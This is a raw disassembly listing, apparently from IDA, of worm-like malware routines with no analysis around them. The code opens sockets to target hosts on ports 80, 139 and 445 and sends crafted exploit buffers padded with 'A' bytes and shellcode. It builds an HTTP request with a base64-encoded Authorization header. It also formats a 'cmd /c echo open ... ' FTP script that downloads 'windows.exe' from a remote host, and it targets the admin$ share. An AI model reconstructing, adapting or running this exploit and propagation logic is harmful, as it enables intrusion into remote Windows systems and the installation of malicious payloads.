call sub_40E8B5
sub ebx, [ebp+arg_8]
lea eax, [ebp+Dst]
push ebx
push eax
lea ecx, [ebp+var_10]
call sub_40E8B5
lea ecx, [ebp+var_10]
call sub_40E841
push [ebp+var_C]
mov eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_30]
call sub_40E8B5
push [ebp+var_34]
mov eax, [ebp+var_38]
push eax
lea ecx, [ebp+var_30]
call sub_40E8B5
lea ecx, [ebp+var_30]
call sub_40E916
lea ecx, [ebp+var_10]
call sub_40E7A0
lea ecx, [ebp+var_38]
call sub_40E7A0
push [ebp+var_4]
mov eax, [ebp+var_8]
push eax
lea ecx, [ebp+var_20]
call sub_40E8B5
push [ebp+var_24]
mov eax, [ebp+var_28]
push eax
lea ecx, [ebp+var_20]
call sub_40E8B5
push [ebp+var_2C]
mov eax, [ebp+var_30]
push eax
lea ecx, [ebp+var_20]
call sub_40E8B5
lea ecx, [ebp+var_20]
call sub_40E916
lea ecx, [ebp+var_8]
call sub_40E7A0
lea ecx, [ebp+var_28]
call sub_40E7A0
lea ecx, [ebp+var_30]
call sub_40E7A0
push edi ; Size
lea eax, [ebp+Dst]
push 41h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push 400h
lea eax, [ebp+Dst]
push eax
lea ecx, [ebp+var_18]
call sub_40E8B5
lea ecx, [ebp+var_18]
call sub_40E841
push 2
push offset dword_4331D8
lea ecx, [ebp+var_18]
call sub_40E8B5
push [ebp+var_1C]
mov eax, [ebp+var_20]
push eax
lea ecx, [ebp+var_18]
call sub_40E8B5
lea ecx, [ebp+var_18]
call sub_40E916
lea ecx, [ebp+var_20]
call sub_40E7A0
push [ebp+var_14]
mov eax, [ebp+var_18]
push eax
lea ecx, [ebp+var_10]
mov [ebp+var_C], esi
mov [ebp+var_10], esi
mov [ebp+var_4], esi
mov [ebp+var_8], esi
call sub_40E8B5
lea ecx, [ebp+var_10]
call sub_40E7B9
lea ecx, [ebp+var_18]
call sub_40E7A0
push offset dword_4331D4 ; Str
lea ecx, [ebp+var_8]
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *)
push [ebp+var_C]
mov eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_8]
call sub_40E8B5
lea ecx, [ebp+var_8]
call sub_40E7B9
lea ecx, [ebp+var_10]
call sub_40E7A0
push offset dword_4331D0 ; Str
lea ecx, [ebp+var_10]
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *)
push [ebp+var_4]
mov eax, [ebp+var_8]
push eax
lea ecx, [ebp+var_10]
call sub_40E8B5
lea ecx, [ebp+var_10]
call sub_40E7B9
lea ecx, [ebp+var_8]
call sub_40E7A0
push offset dword_4331C4 ; Str
lea ecx, [ebp+var_8]
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *)
push [ebp+var_C]
mov eax, [ebp+var_10]
push eax
lea ecx, [ebp+var_8]
call sub_40E8B5
lea ecx, [ebp+var_8]
call sub_40E7B9
lea ecx, [ebp+var_10]
call sub_40E7A0
push offset asc_4331C0 ; "`"
lea ecx, [ebp+var_40]
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *)
push [ebp+var_4]
mov eax, [ebp+var_8]
push eax
lea ecx, [ebp+var_40]
call sub_40E8B5
lea ecx, [ebp+var_8]
call sub_40E7A0
mov ecx, [ebp+var_40]
mov eax, [ebp+arg_0]
mov [eax], ecx
mov ecx, [ebp+var_3C]
pop edi
jmp short loc_40ECC6
; ---------------------------------------------------------------------------
loc_40ECC1: ; CODE XREF: sub_40E971+1F�j
; sub_40E971+2D�j
mov eax, [ebp+arg_0]
mov [eax], edx
loc_40ECC6: ; CODE XREF: sub_40E971+34E�j
pop esi
mov [eax+4], ecx
pop ebx
leave
retn
sub_40E971 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECCD proc near ; CODE XREF: sub_40ED91+A1�p
; sub_40ED91+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
and [ebp+var_4], 0
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
push eax
push 0
lea eax, [ebp+var_10C]
push eax
xor edi, edi
lea eax, [esi+1]
inc edi
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_42B21C ; select
cmp eax, edi
jnz short loc_40ED34
lea eax, [ebp+var_10C]
push eax
push esi
call sub_4298D6 ; __WSAFDIsSet
test eax, eax
jnz short loc_40ED38
loc_40ED34: ; CODE XREF: sub_40ECCD+54�j
xor eax, eax
jmp short loc_40ED48
; ---------------------------------------------------------------------------
loc_40ED38: ; CODE XREF: sub_40ECCD+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_444064 ; recv
loc_40ED48: ; CODE XREF: sub_40ECCD+69�j
pop edi
pop esi
leave
retn
sub_40ECCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED4C proc near ; CODE XREF: sub_40ED91+81�p
; sub_40ED91+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_444234 ; htonl
push 0
mov [ebp+var_4], eax
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_4441A0 ; send
cmp eax, 4
jz short loc_40ED76
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40ED76: ; CODE XREF: sub_40ED4C+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4441A0 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40ED4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40ED91(int,void *Src,size_t Size)
sub_40ED91 proc near ; CODE XREF: sub_40EE6B+48�p
; .text:0040F828�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+Size]
lea ebx, [edi+41h]
push ebx ; Size
mov [ebp+var_4], ebx
call _malloc
mov esi, eax
test esi, esi
pop ecx
jnz short loc_40EDBA
xor al, al
jmp loc_40EE66
; ---------------------------------------------------------------------------
loc_40EDBA: ; CODE XREF: sub_40ED91+20�j
push ebx ; Size
push 0 ; Val
push esi ; Dst
call _memset
push 2Fh ; Size
push offset dword_43F7E4 ; Src
push esi ; Dst
call _memcpy
push 8 ; Size
lea eax, [esi+31h]
push offset dword_43F7D8 ; Src
push eax ; Dst
mov [esi+2Fh], di
call _memcpy
push edi ; Size
push [ebp+Src] ; Src
lea ebx, [esi+3Bh]
push ebx ; Dst
mov [esi+39h], di
call _memcpy
push 6 ; Size
push offset dword_4D50CC ; Src
add ebx, edi
push ebx ; Dst
call _memcpy
mov ebx, [ebp+arg_0]
push 85h
push offset dword_43F750
push ebx
call sub_40ED4C
add esp, 48h
test al, al
jnz short loc_40EE22
loc_40EE1E: ; CODE XREF: sub_40ED91+B5�j
xor bl, bl
jmp short loc_40EE5D
; ---------------------------------------------------------------------------
loc_40EE22: ; CODE XREF: sub_40ED91+8B�j
push 0
mov edi, 100h
push edi
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40ECCD
push [ebp+var_4]
push esi
push ebx
call sub_40ED4C
add esp, 1Ch
test al, al
jz short loc_40EE1E
push 0
push edi
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40ECCD
add esp, 10h
mov bl, 1
loc_40EE5D: ; CODE XREF: sub_40ED91+8F�j
push esi ; Memory
call _free
pop ecx
mov al, bl
loc_40EE66: ; CODE XREF: sub_40ED91+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_40ED91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40EE6B(int,void *Src,size_t Size)
sub_40EE6B proc near ; CODE XREF: .text:0040F80E�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_43F818
push [ebp+arg_0]
call ds:dword_42B210 ; send
cmp eax, 48h
jnz short loc_40EEA6
push 0
push 20h
lea eax, [ebp+var_20]
push eax
push [ebp+arg_0]
call sub_40ECCD
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40EEA6
cmp [ebp+var_20], 82h
jz short loc_40EEAA
loc_40EEA6: ; CODE XREF: sub_40EE6B+1B�j
; sub_40EE6B+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40EEAA: ; CODE XREF: sub_40EE6B+39�j
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push [ebp+arg_0] ; int
call sub_40ED91
add esp, 0Ch
leave
retn
sub_40EE6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EEBD proc near ; CODE XREF: sub_40F47A+29�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
shl eax, 3
test eax, eax
mov [ebp+arg_0], eax
fild [ebp+arg_0]
jge short loc_40EED8
fadd ds:dbl_433200
loc_40EED8: ; CODE XREF: sub_40EEBD+13�j
fmul ds:dbl_4331F8
call __ftol2
test eax, eax
mov [ebp+arg_0], eax
fild [ebp+arg_0]
jge short loc_40EEF3
fadd ds:dbl_433200
loc_40EEF3: ; CODE XREF: sub_40EEBD+2E�j
fst [ebp+var_8]
push ecx
fmul ds:dbl_4331F0
push ecx ; double
fstp [esp+10h+var_10]
call _floor
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call __ftol2
inc eax
leave
retn
sub_40EEBD endp
; [00000034 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Inside(char const *). PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Eos(uint). PRESS KEYPAD "+" TO EXPAND]
; [00000049 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint). PRESS KEYPAD "+" TO EXPAND]
; [0000006C BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::erase(uint,uint). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A07A
loc_40F01A: ; CODE XREF: sub_42A060+3�j
; sub_42A072+3�j ...
push 0 ; Size
push 1 ; char
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEX_NI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint)
retn
; END OF FUNCTION CHUNK FOR sub_42A07A
; [000000D3 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Copy(uint,uint). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40F0F7 proc near ; DATA XREF: .rdata:stru_43A768�o
mov ecx, [ebp-18h]
xor esi, esi
push esi ; Size
push 1 ; char
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEX_NI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint)
push esi
push esi
call __CxxThrowException@8 ; _CxxThrowException(x,x)
int 3 ; Trap to Debugger
sub_40F0F7 endp ; sp-analysis failed
; [0000005E BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Grow(uint,bool). PRESS KEYPAD "+" TO EXPAND]
; [00000095 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint). PRESS KEYPAD "+" TO EXPAND]
; [00000060 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char). PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::reserve(uint). PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(char const *,uint). PRESS KEYPAD "+" TO EXPAND]
; [0000008F BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint). PRESS KEYPAD "+" TO EXPAND]
; [0000006F BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *,uint). PRESS KEYPAD "+" TO EXPAND]
; [00000026 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>> const &). PRESS KEYPAD "+" TO EXPAND]
; [0000001D BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *). PRESS KEYPAD "+" TO EXPAND]
; [0000001D BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40F47A(int,int,int,char *Src)
sub_40F47A proc near ; CODE XREF: sub_40F5F6+23�p
var_4C = qword ptr -4Ch
var_38 = dword ptr -38h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Src = dword ptr 14h
mov eax, offset loc_42A068
call __EH_prolog
sub esp, 2Ch
push edi
xor edi, edi
push edi
lea ecx, [ebp+var_38]
mov [ebp+var_1C], edi
mov [ebp+var_20], 0Fh
call ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Eos(uint)
push [ebp+arg_8]
mov [ebp+var_4], edi
call sub_40EEBD
pop ecx
push eax
lea ecx, [ebp+var_38]
call ?reserve@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::reserve(uint)
cmp [ebp+arg_8], edi
mov [ebp+var_18], edi
jbe loc_40F5CF
push ebx
mov ebx, [ebp+arg_8]
push esi
loc_40F4C3: ; CODE XREF: sub_40F47A+14D�j
cmp [ebp+arg_8], 3
jb short loc_40F4CE
push 3
loc_40F4CB: ; CODE XREF: sub_40F47A+5C�j
pop ebx
jmp short loc_40F4E1
; ---------------------------------------------------------------------------
loc_40F4CE: ; CODE XREF: sub_40F47A+4D�j
cmp [ebp+arg_8], 2
jnz short loc_40F4D8
push 2
jmp short loc_40F4CB
; ---------------------------------------------------------------------------
loc_40F4D8: ; CODE XREF: sub_40F47A+58�j
cmp [ebp+arg_8], 1
jnz short loc_40F4E1
xor ebx, ebx
inc ebx
loc_40F4E1: ; CODE XREF: sub_40F47A+52�j
; sub_40F47A+62�j
test ebx, ebx
mov [ebp+var_1C], ebx
fild [ebp+var_1C]
jge short loc_40F4F1
fadd ds:dbl_433200
loc_40F4F1: ; CODE XREF: sub_40F47A+6F�j
fmul ds:dbl_433208
push ecx
push ecx ; double
fstp [esp+4Ch+var_4C]
call _ceil
pop ecx
pop ecx
call __ftol2
cmp ebx, edi
mov [ebp+var_1C], eax
jbe short loc_40F527
mov esi, [ebp+arg_4]
mov ecx, ebx
mov edx, ecx
shr ecx, 2
lea edi, [ebp+var_10]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_40F527: ; CODE XREF: sub_40F47A+93�j
mov cl, [ebp+var_10]
mov dl, [ebp+var_10]
sar cl, 2
and cl, 3Fh
add [ebp+arg_4], ebx
sub [ebp+arg_8], ebx
mov [ebp+var_14], cl
mov cl, [ebp+var_F]
sar cl, 4
and cl, 0Fh
and dl, 3
shl dl, 4
add cl, dl
mov dl, [ebp+var_F]
mov [ebp+var_13], cl
mov cl, [ebp+var_E]
sar cl, 6
and cl, 3
and dl, 0Fh
shl dl, 2
add cl, dl
mov [ebp+var_12], cl
mov cl, [ebp+var_E]
and cl, 3Fh
xor esi, esi
cmp eax, edi
mov [ebp+var_11], cl
jbe short loc_40F596
add [ebp+var_18], eax
loc_40F579: ; CODE XREF: sub_40F47A+11A�j
movsx eax, [ebp+esi+var_14]
movsx eax, byte_43F868[eax]
push eax ; int
push 1 ; Size
lea ecx, [ebp+var_38]
call ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char)
inc esi
cmp esi, [ebp+var_1C]
jb short loc_40F579
loc_40F596: ; CODE XREF: sub_40F47A+FA�j
cmp [ebp+var_18], 48h
jb short loc_40F5AA
push [ebp+Src] ; Src
lea ecx, [ebp+var_38] ; int
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z_0 ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *)
mov [ebp+var_18], edi
loc_40F5AA: ; CODE XREF: sub_40F47A+120�j
push 4
pop esi
cmp [ebp+var_1C], esi
jnb short loc_40F5C4
sub esi, [ebp+var_1C]
loc_40F5B5: ; CODE XREF: sub_40F47A+148�j
push 3Dh ; int
push 1 ; Size
lea ecx, [ebp+var_38]
call ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char)
dec esi
jnz short loc_40F5B5
loc_40F5C4: ; CODE XREF: sub_40F47A+136�j
cmp [ebp+arg_8], edi
ja loc_40F4C3
pop esi
pop ebx
loc_40F5CF: ; CODE XREF: sub_40F47A+3E�j
mov ecx, [ebp+arg_0]
lea eax, [ebp+var_38]
push eax
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>> const &)
push edi ; Size
push 1 ; char
lea ecx, [ebp+var_38]
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEX_NI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint)
mov ecx, [ebp+var_C]
mov eax, [ebp+arg_0]
pop edi
mov large fs:0, ecx
leave
retn
sub_40F47A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F5F6 proc near ; CODE XREF: .text:0040F7F1�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
arg_10 = dword ptr 18h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
mov eax, offset sub_42A082
call __EH_prolog
sub esp, 1Ch
push ebx
push esi
push edi
and [ebp+var_4], 0
push offset byte_42B633 ; Src
push [ebp+arg_8] ; int
lea eax, [ebp+var_28]
push [ebp+arg_4] ; int
push eax ; int
call sub_40F47A
mov eax, [ebp+arg_20]
mov ecx, [ebp+var_14]
lea esi, [ecx+eax+36h]
push esi ; Size
mov byte ptr [ebp+var_4], 1
call _malloc
mov edi, eax
add esp, 14h
test edi, edi
jnz short loc_40F63F
xor bl, bl
jmp short loc_40F686
; ---------------------------------------------------------------------------
loc_40F63F: ; CODE XREF: sub_40F5F6+43�j
cmp [ebp+var_10], 10h
mov ecx, [ebp+var_24]
jnb short loc_40F64B
lea ecx, [ebp+var_24]
loc_40F64B: ; CODE XREF: sub_40F5F6+50�j
cmp [ebp+arg_24], 10h
mov eax, [ebp+arg_10]
jnb short loc_40F657
lea eax, [ebp+arg_10]
loc_40F657: ; CODE XREF: sub_40F5F6+5C�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi ; Count
push edi ; Dest
call __snprintf
add esp, 14h
push 0
push esi
push edi
push [ebp+arg_0]
call dword_4441A0 ; send
cmp eax, esi
jz short loc_40F67D
xor bl, bl
jmp short loc_40F67F
; ---------------------------------------------------------------------------
loc_40F67D: ; CODE XREF: sub_40F5F6+81�j
mov bl, 1
loc_40F67F: ; CODE XREF: sub_40F5F6+85�j
push edi ; Memory
call _free
pop ecx
loc_40F686: ; CODE XREF: sub_40F5F6+47�j
push 0 ; Size
push 1 ; char
lea ecx, [ebp+var_28]
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEX_NI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint)
push 0 ; Size
push 1 ; char
lea ecx, [ebp+arg_C]
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEX_NI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool,uint)
mov ecx, [ebp+var_C]
pop edi
pop esi
mov al, bl
pop ebx
mov large fs:0, ecx
leave
retn
sub_40F5F6 endp
; [00000022 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *). PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
push edi
xor eax, eax
mov byte ptr [ebp-420h], 0
mov ecx, 0FFh
lea edi, [ebp-41Fh]
rep stosd
stosw
push 8Fh
stosb
lea eax, [ebp-420h]
push offset dword_43FA18
push eax
call _memcpy
add esp, 0Ch
mov eax, offset aWindows_exe ; "windows.exe"
push eax
push eax
movzx eax, word ptr dword_4D1FE4
push eax
push dword ptr [ebp+8]
call sub_4023C9
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d > o&echo user 1 "...
lea eax, [ebp-391h]
push 400h
push eax
call __snprintf
add eax, 90h
push eax
lea eax, [ebp-420h]
push eax
push 164h
lea eax, [ebp-8]
push offset aSvwfbA ; "SVWfì€"
push eax
call sub_40E971
xor esi, esi
add esp, 30h
cmp [ebp-4], esi
jnz short loc_40F76F
xor eax, eax
jmp loc_40F875
; ---------------------------------------------------------------------------
loc_40F76F: ; CODE XREF: .text:0040F766�j
mov [ebp-0Ch], esi
loc_40F772: ; CODE XREF: .text:0040F850�j
test esi, esi
jnz loc_40F856
push 6
push 1
push 2
call ds:dword_42B20C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40F83E
push dword ptr [ebp+0A8h]
xor eax, eax
lea edi, [ebp-1Ah]
stosd
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call dword_444260 ; htons
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call dword_44417C ; inet_addr
mov [ebp-18h], eax
push 10h
lea eax, [ebp-1Ch]
push eax
push ebx
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40F833
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_40F7FB
sub esp, 1Ch
lea eax, [ebp+0Ch]
mov ecx, esp
mov [ebp-20h], esp
push eax
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *)
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40F5F6
add esp, 28h
jmp short loc_40F830
; ---------------------------------------------------------------------------
loc_40F7FB: ; CODE XREF: .text:0040F7D7�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_40F815
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40EE6B
jmp short loc_40F82D
; ---------------------------------------------------------------------------
loc_40F815: ; CODE XREF: .text:0040F805�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_40F833
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40ED91
loc_40F82D: ; CODE XREF: .text:0040F813�j
add esp, 0Ch
loc_40F830: ; CODE XREF: .text:0040F7F9�j
movzx esi, al
loc_40F833: ; CODE XREF: .text:0040F7CE�j
; .text:0040F81F�j
push ebx
call dword_444218 ; closesocket
test esi, esi
jnz short loc_40F849
loc_40F83E: ; CODE XREF: .text:0040F78B�j
push 3E8h
call ds:dword_42B014 ; Sleep
loc_40F849: ; CODE XREF: .text:0040F83C�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_40F772
loc_40F856: ; CODE XREF: .text:0040F774�j
lea ecx, [ebp-8]
call sub_40E7A0
test esi, esi
jz short loc_40F873
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
loc_40F873: ; CODE XREF: .text:0040F860�j
mov eax, esi
loc_40F875: ; CODE XREF: .text:0040F76A�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40F87A(char *Source)
sub_40F87A proc near ; CODE XREF: .text:0040FC33�p
Dst = byte ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
Source = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
push esi
push edi
xor edi, edi
push 20h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
mov [ebp+var_4], edi
call _memset
push offset asc_4332C0 ; "\\\\"
mov esi, offset byte_4D50D8
push esi ; Dest
call _strcpy
push [ebp+Source] ; Source
push esi ; Dest
call _strcat
push offset asc_4332BC ; "\\"
push esi ; Dest
call _strcat
push offset aAdmin ; "admin$"
push esi ; Dest
call _strcat
add esp, 2Ch
push edi
push edi
push edi
lea eax, [ebp+Dst]
push eax
mov [ebp+var_10], esi
mov [ebp+var_20], 1
mov [ebp+var_14], edi
mov [ebp+var_8], edi
call dword_4441AC
push MaxCount ; MaxCount
push [ebp+Source] ; Source
push dword_4D51D8 ; Dest
call _mbstowcs
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
push 66h
push dword_4D51D8
call dword_4440DC
test eax, eax
mov esi, offset dword_4D51E0
jnz short loc_40F929
mov eax, [ebp+var_4]
push edi
push edi
push 64h
push esi
push 0FFFFFFFFh
push dword ptr [eax+4]
push edi
push edi
call ds:dword_42B090 ; WideCharToMultiByte
loc_40F929: ; CODE XREF: sub_40F87A+98�j
cmp [ebp+var_4], edi
jz short loc_40F937
push [ebp+var_4]
call dword_444140
loc_40F937: ; CODE XREF: sub_40F87A+B2�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_40F87A endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40F93D(char *Str,int)
sub_40F93D proc near ; CODE XREF: sub_40F9CE+39�p
; sub_40F9CE+79�p
Str = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+Str]
push edi
push esi ; Str
xor edi, edi
call _strlen
test eax, eax
pop ecx
jbe short loc_40F99E
lea edx, [esi+1]
lea esi, [eax-1]
shr esi, 1
inc esi
loc_40F959: ; CODE XREF: sub_40F93D+5F�j
mov al, [edx-1]
cmp al, 30h
jl short loc_40F96C
cmp al, 39h
jg short loc_40F96C
movsx eax, al
sub eax, 30h
jmp short loc_40F972
; ---------------------------------------------------------------------------
loc_40F96C: ; CODE XREF: sub_40F93D+21�j
; sub_40F93D+25�j
movsx eax, al
sub eax, 57h
loc_40F972: ; CODE XREF: sub_40F93D+2D�j
mov cl, [edx]
shl eax, 4
cmp cl, 30h
jl short loc_40F98A
cmp cl, 39h
jg short loc_40F98A
movsx ecx, cl
